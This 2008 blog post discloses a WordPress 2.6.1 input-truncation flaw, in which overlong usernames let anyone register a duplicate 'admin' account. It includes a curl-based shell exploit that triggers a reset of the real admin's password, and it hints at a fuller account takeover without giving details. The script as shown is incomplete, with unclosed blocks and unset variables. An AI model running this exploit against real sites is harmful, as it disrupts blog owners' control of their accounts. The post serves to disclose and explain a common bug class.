Thu Sep 4 12:23:02 CEST 2008

resetting wordpress admin password

Update 09-08: Quickly after posting this admin password resetter script I pulled the article, since I found it is way too obvious how to completely take over the admin account based on this wordpress flaw.
But, since the info is finally out at milw0rm anyway and the next step might not be as obvious as I thought - the publisher of that text did not see it and even explicitely states this would be "not critical vuln" - I might just as well go ahead and republish this old article.. :)

Looking at the source of php webapps usually is quite funny. Even when projects have been audited by a lot of people, in huge applications it is more or less unachievable to circumvent any unindented use of functions.

Like in this example: wordpress, one of the most often installed webapps worldwide, there might be few php codes audited by more people. Still, there remains the opportunity to find things like the following within just a couple of minutes.

The following exploit might just lead to some trouble for a blog's admin: on a blog which allows user registration, it will allow anybody to quickly and very easily reset the admin password - which can usually only be achieved by the admin confirming the reset-request via mail.
Luckily only the true admin will receive the new password, so the direct impact ist very limited.
It is however possible - and actually rather easy - to take this one step further and completely take over the admin account, locking the original admin out. I won't go into details of that for the time being (this post is meant as an example of a very widespread security vulnerability, namely the missing truncation of overlong input strings, and not as an article about wordpress 0days).

Bug in wordpress in this case is that when registering a new user, the length of the login-name is not checked. Which is a problem since the sql table has a limit of 60 characters, so checking if 'adminx' exists yields a negative result and inserting it leads to another user called 'admin'.
An incredibly common mistake in almost any php application you may happen to look into. This allows creation of a second 'admin' account - in this case you cannot log into it, but that is not a general rule.

Since this is a very common bug, I will release the quick exploit for educational purposes:

    # ez wpress admin-password resetter
    # works w/ wordpress 2.6.1
    # iso 2008


    if [ "X$EMAIL" = "X" ]; then
        echo "[!] Usage: $0 blogurl myemail"
        echo "    fe: $0"

    if [ -e $CURL ]; then
        echo "[-] registering new admin user"
        $CURL $BLOG/wp-login.php?action=register -s \
        -d user_login="admin`perl -e 'print " "x60'`x" \
        -d user_email=$EMAIL 2>&1 >/dev/null
        echo "[x] done"

        echo "[-] requesting password resetlink"
        $CURL $BLOG/wp-login.php?action=lostpassword -s \
        -d user_login=$EMAIL 2>&1 /dev/null
        cat <<SHIT
    [x] done.
        click on link in mail once to reset pass of real admin,
        second click will reset your own password (you cannot login, though)
        real admin will receive a notification-mail including the new password.


Although you should not really be able to create any damage with this script, you are not allowed to use it on any other blog than your own, for obvious reasons.

Posted by iso | Permanent Link | Tags: warez, php, security, code, hpa | comments >>